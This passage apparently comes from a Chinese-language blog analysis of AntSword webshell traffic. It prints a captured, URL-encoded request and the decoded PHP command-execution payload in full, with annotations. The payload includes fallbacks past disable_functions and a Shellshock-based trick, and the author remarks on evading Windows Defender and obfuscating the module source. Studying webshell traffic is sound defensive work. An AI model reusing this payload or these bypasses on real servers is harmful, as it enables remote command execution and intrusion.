reach(%24envarr%20as%20%24v)%20%7Bif%20(!empty(%24v))%20%7B%40putenv(str_replace(%22%7C%7C%7Caskey%7C%7C%7C%22%2C%20%22%3D%22%2C%20%24v))%3B%7D%7D%7D%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%3B%7Delse%7B%24d%3Darray_map('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runshellshock(%24d%2C%20%24c)%20%7Bif%20(substr(%24d%2C%200%2C%201)%20%3D%3D%20%22%2F%22%20%26%26%20fe('putenv')%20%26%26%20(fe('error_log')%20%7C%7C%20fe('mail')))%20%7Bif%20(strstr(readlink(%22%2Fbin%2Fsh%22)%2C%20%22bash%22)%20!%3D%20FALSE)%20%7B%24tmp%20%3D%20tempnam(sys_get_temp_dir()%2C%20'as')%3Bputenv(%22PHP_LOL%3D()%20%7B%20x%3B%20%7D%3B%20%24c%20%3E%24tmp%202%3E%261%22)%3Bif%20(fe('error_log'))%20%7Berror_log(%22a%22%2C%201)%3B%7D%20else%20%7Bmail(%22a%40127.0.0.1%22%2C%20%22%22%2C%20%22%22%2C%20%22-bv%22)%3B%7D%7D%20else%20%7Breturn%20False%3B%7D%24output%20%3D%20%40file_get_contents(%24tmp)%3B%40unlink(%24tmp)%3Bif%20(%24output%20!%3D%20%22%22)%20%7Bprint(%24output)%3Breturn%20True%3B%7D%7Dreturn%20False%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C2048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('proc_open'))%7B%24p%20%3D%20%40proc_open(%24c%2C%20array(1%20%3D%3E%20array('pipe'%2C%20'w')%2C%202%20%3D%3E%20array('pipe'%2C%20'w'))%2C%20%24io)%3Bwhile(!%40feof(%24io%5B1%5D))%7Bprint(%40fgets(%24io%5B1%5D%2C2048))%3B%7Dwhile(!%40feof(%24io%5B2%5D))%7Bprint(%40fgets(%24io%5B2%5D%2C2048))%3B%7D%40fclose(%24io%5B1%5D)%3B%40fclose(%24io%5B2%5D)%3B%40proc_close(%24p)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delseif(runshellshock(%24d%2C%20%24c))%20%7Breturn%20%24ret%3B%7Delseif(substr(%24d%2C0%2C1)!%3D%22%2F%22%20%26%26%20%40class_exists(%22COM%22))%7B%24w%3Dnew%20COM('WScript.shell')%3B%24e%3D%24w-%3Eexec(%24c)%3B%24so%3D%24e-%3EStdOut()%3B%24ret.%3D%24so-%3EReadAll()%3B%24se%3D%24e-%3EStdErr()%3B%24ret.%3D%24se-%3EReadAll()%3Bprint(%24ret)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&p0575f64ef2e5d=Y21k&td4ec8ab550155=Y2QgL2QgIkM6L1VzZXJzL3VzZXNuaWNrL3BocHN0dWR5X3Byby9XV1ciJmNkIEM6L1VzZXJzL3VzZXNuaWNrL3BocHN0dWR5X3Byby9XV1cvY3NyZi8mZWNobyBbU10mY2QmZWNobyBbRV0%3D&y83f85ce29f1ae=

将执行代码摘出来分析。

执行代码

<?php$p0575f64ef2e5d="Y21k";
// $p0575f64ef2e5d="cmd";$td4ec8ab550155="Y2QgL2QgIkM6L1VzZXJzL3VzZXNuaWNrL3BocHN0dWR5X3Byby9XV1ciJmNkIEM6L1VzZXJzL3VzZXNuaWNrL3BocHN0dWR5X3Byby9XV1cvY3NyZi8mZWNobyBbU10mY2QmZWNobyBbRV0=";
// $td4ec8ab550155="cd /d "C:/Users/usesnick/phpstudy_pro/WWW"&cd C:/Users/usesnick/phpstudy_pro/WWW/csrf/&echo [S]&cd&echo [E]";$y83f85ce29f1ae="";@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){return $out;
}
;
function asoutput(){$output=ob_get_contents();ob_end_clean();echo "f3ae7401e";echo @asenc($output);echo "a93d05c";
}
ob_start();
try{$p=base64_decode($p0575f64ef2e5d);$s=base64_decode($td4ec8ab550155);$envstr=@base64_decode($y83f85ce29f1ae);$d=dirname($_SERVER["SCRIPT_FILENAME"]);			# 获取当前路径$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";			# 根据当前路径判断要执行的命令# windows 系统 $c = /c \"{$s}\";# $c="/c cd /d "C:/Users/usesnick/phpstudy_pro/WWW"&cd C:/Users/usesnick/phpstudy_pro/WWW/csrf/&echo [S]&cd&echo [E]"if(substr($d,0,1)=="/"){@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");}else{putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");}		# 修改环境变量，添加powershell和cmd路径# 但是这里的路径跟机器是对应的，可能在发送数据包之前会对路径和文件搜索if(!empty($envstr)){$envarr=explode("|||asline|||", $envstr);			#  分割字符串，返回字符串数组foreach($envarr as $v) {if (!empty($v)) {@putenv(str_replace("|||askey|||", "=", $v));		# 修改系统变量}}}$r="{$p}{$c}";echo $r;# $r = "cmd/c cd /d "C:/Users/usesnick/phpstudy_pro/WWW"&cd C:/Users/usesnick/phpstudy_pro/WWW/csrf/&echo [S]&cd&echo [E]"function fe($f){			#	检测某个函数是否可用function enable$d=explode(",",@ini_get("disable_functions"));if(empty($d)){$d=array();}else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runshellshock($d, $c) {if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {if (strstr(readlink("/bin/sh"), "bash") != FALSE) {$tmp = tempnam(sys_get_temp_dir(), 'as');putenv("PHP_LOL=() {x;};$c >$tmp 2>&1");if (fe('error_log')) {error_log("a", 1);}else {mail("a@127.0.0.1", "", "", "-bv");}} else {return False;}$output = @file_get_contents($tmp);@unlink($tmp);if ($output != "") {print($output);return True;}}return False;};function runcmd($c){# $c = "cmd/c cd /d "C:/Users/usesnick/phpstudy_pro/WWW"&cd C:/Users/usesnick/phpstudy_pro/WWW/csrf/&echo [S]&cd&echo [E] 2>&1"$ret=0;$d=dirname($_SERVER["SCRIPT_FILENAME"]);		# 当前目录# 判断不同函数的可用性，选择可用的函数执行命令if(fe('system')){@system($c,$ret);}else if(fe('passthru')){@passthru($c,$ret);}elseif(fe('shell_exec')){print(@shell_exec($c));}elseif(fe('exec')){@exec($c,$o,$ret);print(join("",$o));}elseif(fe('popen')){$fp=@popen($c,'r');while(!@feof($fp)){print(@fgets($fp,2048));}@pclose($fp);}elseif(fe('proc_open')){$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);while(!@feof($io[1])){print(@fgets($io[1],2048));}while(!@feof($io[2])){print(@fgets($io[2],2048));}@fclose($io[1]);@fclose($io[2]);@proc_close($p);}elseif(fe('antsystem')){@antsystem($c);}elseif(runshellshock($d, $c)) {return $ret;}elseif(substr($d,0,1)!="/" && @class_exists("COM")){$w=new COM('WScript.shell');$e=$w->exec($c);$so=$e->StdOut();$ret.=$so->ReadAll();$se=$e->StdErr();$ret.=$se->ReadAll();print($ret);}else{$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;
}catch(Exception $e){echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();
?>

这部分代码较多，但是判断函数是否可用占了一大部分。

这部分代码向path变量添加了powershell的路径，之后找到可用的函数执行命令。

但是这条命令就是很简单的输出命令，只是一个探测数据包。抓取后面命令执行的数据包分析，发现就是在上面的payload里加命令直接执行了。

这里还出现一个有意思的地方就是命令探测是代码被windows安全中心认定为恶意代码，屏蔽了，不允许执行代码了，在虚拟终端里所有命令都返回-1，关掉防火墙才抓到数据包。这里可用考虑下怎么绕过。

这里基本蚁剑的功能模块分析的差不多了。

模块源码

这部分是蚁剑与相关功能模块的源码的路径，可以自己修改，做混淆。

AntSword-Loader-v4.0.3-win32-x64\workspace\source\modules\termina

请添加图片描述

部分知识点

1.测试连接部分

php-init_set函数：不打开配置文件修改设置。

@ini_set("display_errors", "0");
//不显示错误报告

php-set_time_limit：设置一个程序所允许执行的时间，如果为0则没有时间限制。

php-ob_start：开启缓冲区。

ob_start();		//开启缓冲区
$output=ob_get_contents();		//获取缓冲区内容
ob_end_clean();			//清空缓冲区并关闭输出缓冲
ob_end_flush();			//输出全部内容到浏览器

php-die：与exit函数类似，输入一条消息，退出程序。

php-dirname：返回路径中的目录名称部分，即不返回文件名

echo 'SCRIPT_FILENAME:'.$_SERVER["SCRIPT_FILENAME"].'<br/>';		
$D=dirname($_SERVER["SCRIPT_FILENAME"]);	
echo '$D:'.$D.'<br/>';/*
566a7SCRIPT_FILENAME:C:/Users/usesnick/phpstudy_pro/WWW/antSword-test.php
$D:C:/Users/usesnick/phpstudy_pro/WWW
*/

php-$_SERVER:

//	$_SERVER['SCRIPT_FILENAME']指向当前执行脚本的绝对路径；
//	__FILE__指向当前文件的绝对路径；也就是写在哪个文件里就是哪里。
//	$_SERVER['PATH_TRANSLATED']当前脚本所在文件系统的基本路径// test.php 
require 'common/inc.php'; // common/inc.php 
echo 'SCRIPT_FILENAME 为：' . $_SERVER['SCRIPT_FILENAME']; 
echo '<br />'; 
echo '__FILE__为：' . __FILE__; /*
执行test.PHP，显示结果为：
SCRIPT_FILENAME 为：D:/AppServ/www/test.php
__FILE__为：D:\AppServ\www\common\inc.php
*/

__FILE__ 与 $_SERVER['SCRIPT_FILENAME’的区别]

$_SERVER常用参数

php-posix_getegid：返回当前进程的有效组ID
php-posix_getpwuid：通过用户ID返回有关用户的信息

php-get_current_user：获得PHP当前脚本所有者名称

$s=($u)?$u["name"]:@get_current_user();
echo "\$s:".$s.'<br/>';/*
$s:usesnick
*/

php-php_uname-：返回运行 PHP 的系统的有关信息

echo "php_uname:".php_uname().'<br/>';
//	php_uname:Windows NT DESKTOP-423 10.0 build 19042 (Windows 10) AMD64

2.删除文件

php-get_magic_quotes_gpc()：

本函数取得 PHP 环境配置的变量 magic_quotes_gpc (GPC, Get/Post/Cookie) 值。返回 0 表示关闭本功能；返回 1 表示本功能打开。

当 magic_quotes_gpc 打开时，所有的 ‘ (单引号), ” (双引号), (反斜线) and 空字符会自动转为含有反斜线的溢出字符。
php-stripslashes()：

stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。
php-chmod()：

改变指定文件的权限。
php-rmdir():

删除空的目录。